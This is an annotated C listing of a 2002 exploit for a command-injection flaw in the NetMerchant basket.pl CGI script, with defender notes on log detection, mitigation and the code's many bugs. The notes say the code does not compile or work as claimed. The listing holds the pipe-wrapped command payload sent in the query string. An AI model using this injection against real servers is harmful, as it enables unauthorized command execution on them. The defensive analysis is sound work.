/*
 * PROPERTY OF THE ELECTRONICSOULS CREW !
 * DO NOT DISTRIBUTE !
 *
 * (C) BrainStorm [ElectronicSouls]
 *
 * NetMerchant bug in basket.pl
 * you can execute commands but
 * 0x20 is filterd!
 *
 * it isnt widely used, but could
 * be usefull sometime so...
 * ..KEEP THIS PRIVATE !!$&%
 *
 */

/*
 * Review notes (defender's reading of this listing).
 *
 * What it is: a 2002 proof-of-concept client for a command-injection flaw
 * in the NetMerchant CGI script basket.pl. The request it is meant to send
 * is a GET for <cgi path>basket.pl/bigheadshop? followed by a value wrapped
 * in '|' characters. The root cause inside basket.pl is not shown on this
 * page; presumably the script hands that value to something that treats
 * '|' as a pipe to a command -- confirm against the script itself.
 *
 * Detection: in web-server access logs, look for requests to basket.pl
 * whose query string starts with '|' (or its URL-encoded form %7C). The
 * header above says the script filters 0x20, so a signature should key on
 * the script name and the pipe characters, not on spaces in the value.
 *
 * Mitigation: remove or patch basket.pl wherever it is still deployed, and
 * have the script validate the value against an allow-list before use. No
 * fixed version or advisory id is given on this page.
 *
 * State of the listing: the header names after each #include were lost
 * when the page was extracted, so it does not compile as shown, and several
 * statements do not do what the banner text claims (see inline comments).
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include

/*
 * Entry point. The usage implied by the code is: argv[1] = host,
 * argv[2] = CGI directory, argv[3] = command string.
 *
 * NOTE(review): argv is declared `char **argv[]` (i.e. char ***), not the
 * standard `char **argv` / `char *argv[]`, so every argv[N] below has type
 * char ** rather than char *.
 */
int main(int argc, char **argv[]) {
    struct sockaddr_in dope;
    struct hostent *host;
    char buf[8000];
    /* STR1 and STR2 are declared int but are assigned pointer values below. */
    int sock, rt, len, STR1, STR2;

    /* argc is never consulted; argv[2] and argv[3] are read unconditionally. */
    STR1 = argv[2];
    STR2 = argv[3];

    /*
     * Each `if (...)` is terminated by the ';' directly after it, so the
     * braced block that follows is an ordinary block and always runs:
     * the usage message is always printed (without exiting), and STR1 and
     * STR2 always end up holding the defaults, whatever the arguments were.
     */
    if (argv[1] == 0); { printf("enter a host \n"); }
    if (argv[2] == 0); { STR1 = "/cgi-bin/"; }
    if (argv[3] == 0); { STR2 = "whoami"; }

    /* The lookup result is stored in host but never read in this function. */
    host = gethostbyname((void *)argv[1]);
    /* Return value of socket() is not checked. */
    sock = socket(AF_INET, SOCK_STREAM, 0);
    bzero(&(dope.sin_zero), 8);
    dope.sin_family = AF_INET;
    /*
     * The address is set to INADDR_ANY, not to anything derived from host,
     * so the connection target is not taken from argv[1]. Port is fixed at 80.
     */
    dope.sin_addr.s_addr = htonl(INADDR_ANY);
    dope.sin_port = htons(80);
    rt = connect(sock, (void *)&dope, sizeof(dope));
    if (rt == -1) { perror("Connect.."); printf("\n"); exit(1); }

    printf("\n\n[ ElectronicSouls ] - NetMerchant basket.pl exploit \n");
    printf("(C) BrainStorm - 2002 \n\n");
    /* Prints argv[1] regardless of which address connect() actually used. */
    printf("[!] Connected to %s\n", argv[1]);

    memset(&buf, 0, sizeof(buf));
    /*
     * The format string is the literal "GET " with no conversion specifiers,
     * so the remaining arguments are not formatted into buf. The argument
     * list still documents the intended request shape that a log signature
     * should match: the CGI path, then basket.pl/bigheadshop?| <value> |.
     */
    sprintf(buf, "GET ", STR1, "basket.pl/bigheadshop?|", STR2, "|", "HTTP/1.1\n\n", argv[2], argv[3]);
    printf("[*] Sending exploit string..\n");
    /*
     * Sends sizeof(buf) bytes, i.e. the whole 8000-byte zero-filled buffer,
     * not just the string in it. The return value of send() is not checked.
     */
    send(sock, buf, sizeof(buf), 0);

    /* The body ends in exit(0) on every path, so this loop runs at most once. */
    while (1) {
        memset(&buf, 0, sizeof(buf));
        len = sizeof(buf);
        /*
         * Reads up to the full buffer size; if all 8000 bytes are filled
         * there is no terminating NUL left for the printf("%s") below.
         */
        rt = read(sock, &buf, len);
        /* A failed or empty read still exits with status 0. */
        if (rt <= 0) { printf("error!\n"); exit(0); }
        printf("%s\n", buf);
        /* perror() here runs after a successful read and prints whatever errno currently holds. */
        perror("Status ");
        exit(0);
    }
}